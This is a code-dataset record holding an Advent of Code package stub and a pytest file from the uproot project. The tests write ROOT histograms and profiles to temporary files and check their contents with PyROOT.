| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ceb194e0d0573b7a449a4d9241e58cf749ea232f
| 86
|
py
|
Python
|
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
"""
Solutions for 2020's Advent of Code
"""
# TODO is it tidy?
# TODO is it complete?a
| 17.2
| 35
| 0.674419
| 16
| 86
| 3.625
| 0.8125
| 0.206897
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057971
| 0.197674
| 86
| 5
| 36
| 17.2
| 0.782609
| 0.872093
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b5ab38e3f12d77a734e16bacedb3dacf93042b3
| 26,536
|
py
|
Python
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 133
|
2020-05-08T21:34:11.000Z
|
2022-03-07T18:12:58.000Z
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 269
|
2020-05-13T02:42:24.000Z
|
2022-03-24T20:24:16.000Z
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 45
|
2020-05-15T17:48:04.000Z
|
2022-03-18T19:23:07.000Z
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
import os
import numpy as np
import pytest
import skhep_testdata
import uproot
import uproot.writing
ROOT = pytest.importorskip("ROOT")
def test_copy(tmp_path):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = ROOT.TH1F("h1", "title", 8, -3.14, 2.71)
h1.SetBinContent(0, 0.0)
h1.SetBinContent(1, 1.1)
h1.SetBinContent(2, 2.2)
h1.SetBinContent(3, 3.3)
h1.SetBinContent(4, 4.4)
h1.SetBinContent(5, 5.5)
h1.SetBinContent(6, 6.6)
h1.SetBinContent(7, 7.7)
h1.SetBinContent(8, 8.8)
h1.SetBinContent(9, 9.9)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["h1"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("h1")
assert h3.GetBinContent(0) == pytest.approx(0.0)
assert h3.GetBinContent(1) == pytest.approx(1.1)
assert h3.GetBinContent(2) == pytest.approx(2.2)
assert h3.GetBinContent(3) == pytest.approx(3.3)
assert h3.GetBinContent(4) == pytest.approx(4.4)
assert h3.GetBinContent(5) == pytest.approx(5.5)
assert h3.GetBinContent(6) == pytest.approx(6.6)
assert h3.GetBinContent(7) == pytest.approx(7.7)
assert h3.GetBinContent(8) == pytest.approx(8.8)
assert h3.GetBinContent(9) == pytest.approx(9.9)
f3.Close()
def test_from_old(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
with uproot.open(skhep_testdata.data_path("uproot-histograms.root")) as fin:
one = fin["one"]
with uproot.recreate(newfile) as fout:
fout["one"] = one
f1 = ROOT.TFile(newfile)
h1 = f1.Get("one")
assert h1.GetBinContent(0) == 0
assert h1.GetBinContent(1) == 68
assert h1.GetBinContent(2) == 285
assert h1.GetBinContent(3) == 755
assert h1.GetBinContent(4) == 1580
assert h1.GetBinContent(5) == 2296
assert h1.GetBinContent(6) == 2286
assert h1.GetBinContent(7) == 1570
assert h1.GetBinContent(8) == 795
assert h1.GetBinContent(9) == 289
assert h1.GetBinContent(10) == 76
assert h1.GetBinContent(11) == 0
f1.Close()
def test_new_name(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
with uproot.open(skhep_testdata.data_path("uproot-histograms.root")) as fin:
one = fin["one"]
with uproot.recreate(newfile) as fout:
fout["whatever"] = one
f1 = ROOT.TFile(newfile)
h1 = f1.Get("whatever")
assert h1.GetBinContent(0) == 0
assert h1.GetBinContent(1) == 68
assert h1.GetBinContent(2) == 285
assert h1.GetBinContent(3) == 755
assert h1.GetBinContent(4) == 1580
assert h1.GetBinContent(5) == 2296
assert h1.GetBinContent(6) == 2286
assert h1.GetBinContent(7) == 1570
assert h1.GetBinContent(8) == 795
assert h1.GetBinContent(9) == 289
assert h1.GetBinContent(10) == 76
assert h1.GetBinContent(11) == 0
f1.Close()
@pytest.mark.parametrize("cls", [ROOT.TH1C, ROOT.TH1D, ROOT.TH1F, ROOT.TH1I, ROOT.TH1S])
def test_all_TH1(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71)
h1.Fill(-4)
h1.Fill(-3.1)
h1.Fill(-3.1)
h1.Fill(2.7, 5)
h1.Fill(3, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(1)
assert h3.GetBinContent(1) == pytest.approx(2)
assert h3.GetBinContent(2) == pytest.approx(5)
assert h3.GetBinContent(3) == pytest.approx(4)
assert h3.GetBinError(0) == pytest.approx(1)
assert h3.GetBinError(1) == pytest.approx(1.4142135623730951)
assert h3.GetBinError(2) == pytest.approx(5)
assert h3.GetBinError(3) == pytest.approx(4)
f3.Close()
@pytest.mark.parametrize("cls", [ROOT.TH2C, ROOT.TH2D, ROOT.TH2F, ROOT.TH2I, ROOT.TH2S])
def test_all_TH2(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71, 3, -5, 10)
h1.Fill(-4, 9)
h1.Fill(-3.1, 9)
h1.Fill(-3.1, 9)
h1.Fill(2.7, -4, 5)
h1.Fill(3, 9, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 1, 0]),
pytest.approx([0, 0, 0, 2, 0]),
pytest.approx([0, 5, 0, 0, 0]),
pytest.approx([0, 0, 0, 4, 0]),
]
f3.Close()
@pytest.mark.parametrize("cls", [ROOT.TH3C, ROOT.TH3D, ROOT.TH3F, ROOT.TH3I, ROOT.TH3S])
def test_all_TH3(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71, 3, -5, 10, 1, 100, 200)
h1.Fill(-4, 9, 150)
h1.Fill(-3.1, 9, 150)
h1.Fill(-3.1, 9, 150)
h1.Fill(2.7, -4, 150, 5)
h1.Fill(3, 9, 150, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetNbinsZ() == 1
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
approx = pytest.approx
assert [
[[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 1, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 2, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 5, 0]), [0, 0, 0], approx([0, 0, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 4, 0]), [0, 0, 0]],
]
f3.Close()
def test_TProfile(tmp_path):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = ROOT.TProfile("h1", "title", 2, -3.14, 2.71)
h1.Fill(-4, 10)
h1.Fill(-3.1, 10)
h1.Fill(-3.1, 20)
h1.Fill(2.7, 20)
h1.Fill(3, 20)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(10)
assert h3.GetBinContent(1) == pytest.approx(15)
assert h3.GetBinContent(2) == pytest.approx(20)
assert h3.GetBinContent(3) == pytest.approx(20)
assert h3.GetBinError(0) == pytest.approx(0)
assert h3.GetBinError(1) == pytest.approx(np.sqrt(12.5))
assert h3.GetBinError(2) == pytest.approx(0)
assert h3.GetBinError(3) == pytest.approx(0)
f3.Close()
def test_TProfile2D(tmp_path):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = ROOT.TProfile2D("h1", "title", 2, -3.14, 2.71, 3, -5, 10)
h1.Fill(-4, 9, 10)
h1.Fill(-3.1, 9, 10)
h1.Fill(-3.1, 9, 20)
h1.Fill(2.7, -4, 20)
h1.Fill(3, 9, 20)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 10, 0]),
pytest.approx([0, 0, 0, 15, 0]),
pytest.approx([0, 20, 0, 0, 0]),
pytest.approx([0, 0, 0, 20, 0]),
]
assert [[h3.GetBinError(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 0, 0]),
pytest.approx([0, 0, 0, np.sqrt(12.5), 0]),
pytest.approx([0, 0, 0, 0, 0]),
pytest.approx([0, 0, 0, 0, 0]),
]
f3.Close()
def test_TProfile3D(tmp_path):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = ROOT.TProfile3D("h1", "title", 2, -3.14, 2.71, 3, -5, 10, 1, 100, 200)
h1.Fill(-4, 9, 150, 10)
h1.Fill(-3.1, 9, 150, 10)
h1.Fill(-3.1, 9, 150, 20)
h1.Fill(2.7, -4, 150, 20)
h1.Fill(3, 9, 150, 20)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetNbinsZ() == 1
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
approx = pytest.approx
assert [
[[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 10, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 15, 0], [0, 0, 0]],
[[0, 0, 0], [0, 20, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 20, 0], [0, 0, 0]],
]
assert [
[[h3.GetBinError(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, approx(np.sqrt(12.5)), 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
]
f3.Close()
def test_ex_nihilo_TH1(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TH1x(
fName="h1",
fTitle="title",
data=np.array([1.0, 2.0, 5.0, 4.0], np.float64),
fEntries=5.0,
fTsumw=7.0,
fTsumw2=27.0,
fTsumwx=7.3,
fTsumwx2=55.67,
fSumw2=np.array([1.0, 2.0, 25.0, 16.0], np.float64),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(1)
assert h3.GetBinContent(1) == pytest.approx(2)
assert h3.GetBinContent(2) == pytest.approx(5)
assert h3.GetBinContent(3) == pytest.approx(4)
assert h3.GetBinError(0) == pytest.approx(1)
assert h3.GetBinError(1) == pytest.approx(1.4142135623730951)
assert h3.GetBinError(2) == pytest.approx(5)
assert h3.GetBinError(3) == pytest.approx(4)
f3.Close()
def test_ex_nihilo_TH2(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TH2x(
fName="h1",
fTitle="title",
data=np.array(
[0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 2, 0, 4, 0, 0, 0, 0], np.float64
),
fEntries=5.0,
fTsumw=7.0,
fTsumw2=27.0,
fTsumwx=7.3,
fTsumwx2=55.67,
fTsumwy=-2.0,
fTsumwy2=242.0,
fTsumwxy=-109.8,
fSumw2=np.array(
[0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 1, 2, 0, 16, 0, 0, 0, 0], np.float64
),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
fYaxis=uproot.writing.identify.to_TAxis(
fName="yaxis",
fTitle="",
fNbins=3,
fXmin=-5.0,
fXmax=10.0,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 1, 0]),
pytest.approx([0, 0, 0, 2, 0]),
pytest.approx([0, 5, 0, 0, 0]),
pytest.approx([0, 0, 0, 4, 0]),
]
f3.Close()
def test_ex_nihilo_TH3(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TH3x(
fName="h1",
fTitle="title",
data=np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 2, 0, 4, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.float64,
),
fEntries=5.0,
fTsumw=7.0,
fTsumw2=27.0,
fTsumwx=7.3,
fTsumwx2=55.67,
fTsumwy=-2.0,
fTsumwy2=242.0,
fTsumwxy=-109.8,
fTsumwz=1050.0,
fTsumwz2=157500.0,
fTsumwxz=1095.0,
fTsumwyz=-300.0,
fSumw2=np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 1, 2, 0, 16, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.float64,
),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
fYaxis=uproot.writing.identify.to_TAxis(
fName="yaxis",
fTitle="",
fNbins=3,
fXmin=-5.0,
fXmax=10.0,
),
fZaxis=uproot.writing.identify.to_TAxis(
fName="zaxis",
fTitle="",
fNbins=1,
fXmin=100.0,
fXmax=200.0,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetNbinsZ() == 1
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
approx = pytest.approx
assert [
[[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 1, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 2, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 5, 0]), [0, 0, 0], approx([0, 0, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 4, 0]), [0, 0, 0]],
]
f3.Close()
def test_ex_nihilo_TProfile(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TProfile(
fName="h1",
fTitle="title",
data=np.array([10, 30, 20, 20], np.float64),
fEntries=5.0,
fTsumw=3.0,
fTsumw2=3.0,
fTsumwx=-3.5,
fTsumwx2=26.51,
fTsumwy=50.0,
fTsumwy2=900.0,
fSumw2=np.array([100, 500, 400, 400], np.float64),
fBinEntries=np.array([1, 2, 1, 1], np.float64),
fBinSumw2=np.array([], np.float64),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(10)
assert h3.GetBinContent(1) == pytest.approx(15)
assert h3.GetBinContent(2) == pytest.approx(20)
assert h3.GetBinContent(3) == pytest.approx(20)
assert h3.GetBinError(0) == pytest.approx(0)
assert h3.GetBinError(1) == pytest.approx(np.sqrt(12.5))
assert h3.GetBinError(2) == pytest.approx(0)
assert h3.GetBinError(3) == pytest.approx(0)
f3.Close()
def test_ex_nihilo_TProfile2D(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TProfile2D(
fName="h1",
fTitle="title",
data=np.array(
[0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 10, 30, 0, 20, 0, 0, 0, 0], np.float64
),
fEntries=5.0,
fTsumw=3.0,
fTsumw2=3.0,
fTsumwx=-3.5,
fTsumwx2=26.51,
fTsumwy=14.0,
fTsumwy2=178.0,
fTsumwxy=-66.6,
fTsumwz=50.0,
fTsumwz2=900.0,
fSumw2=np.array(
[0, 0, 0, 0, 0, 0, 400, 0, 0, 0, 0, 0, 100, 500, 0, 400, 0, 0, 0, 0],
np.float64,
),
fBinEntries=np.array(
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 0, 0, 0, 0], np.float64
),
fBinSumw2=np.array([], np.float64),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
fYaxis=uproot.writing.identify.to_TAxis(
fName="yaxis",
fTitle="",
fNbins=3,
fXmin=-5.0,
fXmax=10.0,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 10, 0]),
pytest.approx([0, 0, 0, 15, 0]),
pytest.approx([0, 20, 0, 0, 0]),
pytest.approx([0, 0, 0, 20, 0]),
]
assert [[h3.GetBinError(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 0, 0]),
pytest.approx([0, 0, 0, np.sqrt(12.5), 0]),
pytest.approx([0, 0, 0, 0, 0]),
pytest.approx([0, 0, 0, 0, 0]),
]
f3.Close()
def test_ex_nihilo_TProfile3D(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TProfile3D(
fName="h1",
fTitle="title",
data=np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 10, 30, 0, 20, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.float64,
),
fEntries=5.0,
fTsumw=3.0,
fTsumw2=3.0,
fTsumwx=-3.5,
fTsumwx2=26.51,
fTsumwy=14.0,
fTsumwy2=178.0,
fTsumwxy=-66.6,
fTsumwz=450.0,
fTsumwz2=67500.0,
fTsumwxz=-525.0,
fTsumwyz=2100.0,
fTsumwt=50.0,
fTsumwt2=900.0,
fSumw2=np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 400, 0, 0, 0, 0, 0, 100, 500, 0, 400, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.float64,
),
fBinEntries=np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 0, 0, 0, 0]
+ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.float64,
),
fBinSumw2=np.array([], np.float64),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
fYaxis=uproot.writing.identify.to_TAxis(
fName="yaxis",
fTitle="",
fNbins=3,
fXmin=-5.0,
fXmax=10.0,
),
fZaxis=uproot.writing.identify.to_TAxis(
fName="zaxis",
fTitle="",
fNbins=1,
fXmin=100.0,
fXmax=200.0,
),
)
with uproot.recreate(newfile) as fout:
fout["out"] = h1
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 35
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetNbinsZ() == 1
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
approx = pytest.approx
assert [
[[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 10, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 15, 0], [0, 0, 0]],
[[0, 0, 0], [0, 20, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 20, 0], [0, 0, 0]],
]
assert [
[[h3.GetBinError(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, approx(np.sqrt(12.5)), 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
]
f3.Close()
def test_delete(tmp_path):
newfile = os.path.join(tmp_path, "newfile.root")
h1 = uproot.writing.identify.to_TH1x(
fName="h1",
fTitle="title",
data=np.array([1.0, 2.0, 5.0, 4.0], np.float64),
fEntries=5.0,
fTsumw=7.0,
fTsumw2=27.0,
fTsumwx=7.3,
fTsumwx2=55.67,
fSumw2=np.array([1.0, 2.0, 25.0, 16.0], np.float64),
fXaxis=uproot.writing.identify.to_TAxis(
fName="xaxis",
fTitle="",
fNbins=2,
fXmin=-3.14,
fXmax=2.71,
),
)
with uproot.recreate(newfile) as fout:
fout["one"] = h1
fout["two"] = h1
with uproot.update(newfile) as fin:
del fin["one"]
f3 = ROOT.TFile(newfile)
h3 = f3.Get("two")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
